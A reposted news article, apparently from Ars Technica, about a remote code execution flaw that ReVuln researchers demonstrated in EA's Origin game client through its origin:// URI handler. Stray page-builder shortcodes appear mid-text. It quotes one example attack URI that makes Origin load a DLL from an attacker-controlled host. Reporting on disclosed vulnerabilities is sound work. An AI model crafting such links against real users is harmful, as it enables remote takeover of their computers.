More than 40 million people could be affected by a vulnerability researchers uncovered in EA’s Origin online game platform allowing attackers to remotely execute malicious code on players’ computers.
The attack, demonstrated on Friday at the Black Hat security conference in Amsterdam, takes just seconds to execute. In some cases, it requires no interaction by victims, researchers from Malta-based ReVuln (@revuln) told Ars Technica. It manipulates the uniform resource identifiers EA’s site uses to automatically start games on PCs.
“The Origin platform allows malicious users to exploit local vulnerabilities or features by abusing the Origin URI handling mechanism,” ReVuln researchers Donato Ferrante and Luigi Auriemma wrote in a paper accompanying last week’s demonstration.
“In other words, an attacker can craft a malicious Internet link to execute malicious code remotely on [fusion_builder_container hundred_percent=”yes” overflow=”visible”][fusion_builder_row][fusion_builder_column type=”1_1″ background_position=”left top” background_color=”” border_size=”” border_color=”” border_style=”solid” spacing=”yes” background_image=”” background_repeat=”no-repeat” padding=”” margin_top=”0px” margin_bottom=”0px” class=”” id=”” animation_type=”” animation_speed=”0.3″ animation_direction=”left” hide_on_mobile=”no” center_content=”no” min_height=”none”][a] victim’s system, which has Origin installed.”
The researchers’ demo shows them taking control of a computer that has the Origin client and Crysis 3 game installed. Behind the scenes, the EA platform uses the origin://LaunchGame/71503 link to activate the game.
When a targeted user instead clicks on a URI such as origin://LaunchGame/71503?CommandParams= -openautomate \ATTACKER_IPevil.dll, the Origin client will load a Windows dynamic link library file of the attackers’ choosing on the victim’s computer.
EA Games on the problem:
“Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure,” an EA spokesman wrote in an e-mail to Ars Technica.
The attack is similar to an exploit the same researchers demonstrated in October on Steam.
The Origin attack works much the same. When an origin:// link is opened for the first time, browsers will typically ask if a user wants it to open in the Origin client, which is the registered application for such URLs.
Browsers handle these links differently, with some displaying full paths, others showing only parts of them, and still others not displaying the URL at all. Some confirmation prompts give users the option of using the Origin client to open all origin:// links encountered in the future.
Source: Ars Technica[/fusion_builder_column][/fusion_builder_row][/fusion_builder_container]